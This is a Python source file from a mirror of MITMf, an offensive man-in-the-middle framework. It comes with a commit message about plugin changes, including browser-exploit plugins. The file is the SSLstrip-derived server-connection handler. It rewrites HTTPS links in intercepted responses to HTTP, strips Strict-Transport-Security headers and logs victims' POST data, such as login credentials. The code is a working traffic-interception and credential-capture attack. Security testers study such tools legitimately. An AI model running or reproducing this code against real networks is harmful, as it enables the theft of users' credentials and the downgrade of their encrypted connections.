mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-06 21:12:16 -07:00
The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework realeases and never removed. Replace plugin has been given it's own section in the config file currently the BeedAutorun and Javapwn plugins have to be cleaned up... BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too , as supposed to only Java exploits Since we now have a built in SMB server, removed options to specify a host in the SMBauth plugin Tweaked the output of some plugins
255 lines
10 KiB
Python
255 lines
10 KiB
Python
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
|
#
|
|
# This program is free software; you can redistribute it and/or
|
|
# modify it under the terms of the GNU General Public License as
|
|
# published by the Free Software Foundation; either version 3 of the
|
|
# License, or (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful, but
|
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
# General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program; if not, write to the Free Software
|
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
# USA
|
|
#
|
|
|
|
import logging
|
|
import re
|
|
import string
|
|
import random
|
|
import zlib
|
|
import gzip
|
|
import StringIO
|
|
import sys
|
|
|
|
from user_agents import parse
|
|
from twisted.web.http import HTTPClient
|
|
from URLMonitor import URLMonitor
|
|
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
|
|
|
mitmf_logger = logging.getLogger('mitmf')
|
|
|
|
class ServerConnection(HTTPClient):
|
|
|
|
''' The server connection is where we do the bulk of the stripping. Everything that
|
|
comes back is examined. The headers we dont like are removed, and the links are stripped
|
|
from HTTPS to HTTP.
|
|
'''
|
|
|
|
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
|
|
urlType = re.compile(r"https://", re.IGNORECASE)
|
|
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
|
|
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
|
|
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
|
|
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
|
|
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
|
|
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
|
|
|
|
def __init__(self, command, uri, postData, headers, client):
|
|
|
|
self.command = command
|
|
self.uri = uri
|
|
self.postData = postData
|
|
self.headers = headers
|
|
self.client = client
|
|
self.printPostData = True
|
|
self.clientInfo = None
|
|
self.urlMonitor = URLMonitor.getInstance()
|
|
self.hsts = URLMonitor.getInstance().hsts
|
|
self.app = URLMonitor.getInstance().app
|
|
self.plugins = ProxyPlugins.getInstance()
|
|
self.isImageRequest = False
|
|
self.isCompressed = False
|
|
self.contentLength = None
|
|
self.shutdownComplete = False
|
|
|
|
def getPostPrefix(self):
|
|
return "POST"
|
|
|
|
def sendRequest(self):
|
|
if self.command == 'GET':
|
|
try:
|
|
user_agent = parse(self.headers['user-agent'])
|
|
self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
|
|
except Exception as e:
|
|
mitmf_logger.debug("[ServerConnection] Failed to parse client UA: {}".format(e))
|
|
self.clientInfo = "{} ".format(self.client.getClientIP())
|
|
|
|
mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
|
|
mitmf_logger.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri))
|
|
|
|
self.sendCommand(self.command, self.uri)
|
|
|
|
def sendHeaders(self):
|
|
for header, value in self.headers.iteritems():
|
|
mitmf_logger.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
|
|
self.sendHeader(header, value)
|
|
|
|
self.endHeaders()
|
|
|
|
def sendPostData(self):
|
|
if self.printPostData is True: #So we can disable printing POST data coming from plugins
|
|
try:
|
|
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
|
|
if len(postdata) > 0:
|
|
mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata))
|
|
except UnicodeDecodeError and UnicodeEncodeError:
|
|
mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
|
|
pass
|
|
|
|
self.printPostData = True
|
|
self.transport.write(self.postData)
|
|
|
|
def connectionMade(self):
|
|
mitmf_logger.debug("[ServerConnection] HTTP connection made.")
|
|
self.plugins.hook()
|
|
self.sendRequest()
|
|
self.sendHeaders()
|
|
|
|
if (self.command == 'POST'):
|
|
self.sendPostData()
|
|
|
|
def handleStatus(self, version, code, message):
|
|
mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
|
|
self.client.setResponseCode(int(code), message)
|
|
|
|
def handleHeader(self, key, value):
|
|
if (key.lower() == 'location'):
|
|
value = self.replaceSecureLinks(value)
|
|
if self.app:
|
|
self.urlMonitor.addRedirection(self.client.uri, value)
|
|
|
|
if (key.lower() == 'content-type'):
|
|
if (value.find('image') != -1):
|
|
self.isImageRequest = True
|
|
mitmf_logger.debug("[ServerConnection] Response is image content, not scanning")
|
|
|
|
if (key.lower() == 'content-encoding'):
|
|
if (value.find('gzip') != -1):
|
|
mitmf_logger.debug("[ServerConnection] Response is compressed")
|
|
self.isCompressed = True
|
|
|
|
elif (key.lower()== 'strict-transport-security'):
|
|
mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.clientInfo))
|
|
|
|
elif (key.lower() == 'content-length'):
|
|
self.contentLength = value
|
|
|
|
elif (key.lower() == 'set-cookie'):
|
|
self.client.responseHeaders.addRawHeader(key, value)
|
|
|
|
else:
|
|
self.client.setHeader(key, value)
|
|
|
|
def handleEndHeaders(self):
|
|
if (self.isImageRequest and self.contentLength != None):
|
|
self.client.setHeader("Content-Length", self.contentLength)
|
|
|
|
if self.length == 0:
|
|
self.shutdown()
|
|
|
|
self.plugins.hook()
|
|
|
|
if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
|
|
for header, value in self.client.headers.iteritems():
|
|
mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
|
|
|
|
def handleResponsePart(self, data):
|
|
if (self.isImageRequest):
|
|
self.client.write(data)
|
|
else:
|
|
HTTPClient.handleResponsePart(self, data)
|
|
|
|
def handleResponseEnd(self):
|
|
if (self.isImageRequest):
|
|
self.shutdown()
|
|
else:
|
|
try:
|
|
HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
|
|
except:
|
|
pass
|
|
|
|
def handleResponse(self, data):
|
|
if (self.isCompressed):
|
|
mitmf_logger.debug("[ServerConnection] Decompressing content...")
|
|
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
|
|
|
|
data = self.replaceSecureLinks(data)
|
|
data = self.plugins.hook()['data']
|
|
|
|
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
|
|
|
|
if (self.contentLength != None):
|
|
self.client.setHeader('Content-Length', len(data))
|
|
|
|
try:
|
|
self.client.write(data)
|
|
except:
|
|
pass
|
|
|
|
try:
|
|
self.shutdown()
|
|
except:
|
|
mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
|
|
|
|
def replaceSecureLinks(self, data):
|
|
if self.hsts:
|
|
|
|
sustitucion = {}
|
|
patchDict = self.urlMonitor.patchDict
|
|
|
|
if len(patchDict)>0:
|
|
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
|
|
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
|
|
|
|
iterator = re.finditer(ServerConnection.urlExpression, data)
|
|
for match in iterator:
|
|
url = match.group()
|
|
|
|
mitmf_logger.debug("[ServerConnection][HSTS] Found secure reference: " + url)
|
|
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
|
|
mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
|
|
sustitucion[url] = nuevaurl
|
|
#data.replace(url,nuevaurl)
|
|
|
|
#data = self.urlMonitor.DataReemplazo(data)
|
|
if len(sustitucion)>0:
|
|
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
|
|
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
|
|
|
|
#mitmf_logger.debug("HSTS DEBUG received data:\n"+data)
|
|
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
|
|
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
|
|
#if data.find("http://w.face")!=-1:
|
|
# mitmf_logger.debug("HSTS DEBUG Found error in modifications")
|
|
# raw_input("Press Enter to continue")
|
|
#return re.sub(ServerConnection.urlType, 'http://web.', data)
|
|
return data
|
|
|
|
else:
|
|
|
|
iterator = re.finditer(ServerConnection.urlExpression, data)
|
|
|
|
for match in iterator:
|
|
url = match.group()
|
|
|
|
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
|
|
|
|
url = url.replace('https://', 'http://', 1)
|
|
url = url.replace('&', '&')
|
|
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
|
|
|
|
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
|
|
return re.sub(ServerConnection.urlType, 'http://', data)
|
|
|
|
def shutdown(self):
|
|
if not self.shutdownComplete:
|
|
self.shutdownComplete = True
|
|
try:
|
|
self.client.finish()
|
|
self.transport.loseConnection()
|
|
except:
|
|
pass
|